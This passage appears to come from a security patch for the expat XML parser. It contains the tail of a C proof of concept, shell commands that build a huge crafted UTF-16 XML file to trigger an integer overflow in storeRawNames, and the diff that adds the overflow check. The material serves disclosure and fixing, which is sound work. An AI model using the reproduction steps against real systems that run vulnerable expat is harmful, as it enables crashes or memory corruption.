printf("iteration %d: XML_Parse returns %d\n", ++i,
XML_Parse(parser, buf, CHUNK, XML_FALSE));
}
free(buf);
fclose(fp);
XML_ParserFree(parser);
return 0;
}
EOF
gcc -fsanitize=address -lexpat -o poc poc.c
```
3. Construct specially prepared UTF-16 XML file:
```
dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml
echo -n '<a><' | dd conv=notrunc of=poc-utf8.xml
echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368
iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml
```
4. Run proof of concept:
```
./poc poc-utf16.xml
```
---
expat/lib/xmlparse.c | 7 ++++++-
1 file changed, 6 insertions(+), 1 deletion(-)
--- a/lib/xmlparse.c
+++ b/lib/xmlparse.c
@@ -2424,6 +2424,7 @@ storeRawNames(XML_Parser parser) {
while (tag) {
int bufSize;
int nameLen = sizeof(XML_Char) * (tag->name.strLen + 1);
+ size_t rawNameLen;
char *rawNameBuf = tag->buf + nameLen;
/* Stop if already stored. Since m_tagStack is a stack, we can stop
at the first entry that has already been copied; everything
@@ -2435,7 +2436,11 @@ storeRawNames(XML_Parser parser) {
/* For re-use purposes we need to ensure that the
size of tag->buf is a multiple of sizeof(XML_Char).
*/
- bufSize = nameLen + ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
+ rawNameLen = ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
+ /* Detect and prevent integer overflow. */
+ if (rawNameLen > (size_t)INT_MAX - nameLen)
+ return XML_FALSE;
+ bufSize = nameLen + (int)rawNameLen;
if (bufSize > tag->bufEnd - tag->buf) {
char *temp = (char *)REALLOC(parser, tag->buf, bufSize);
if (temp == NULL)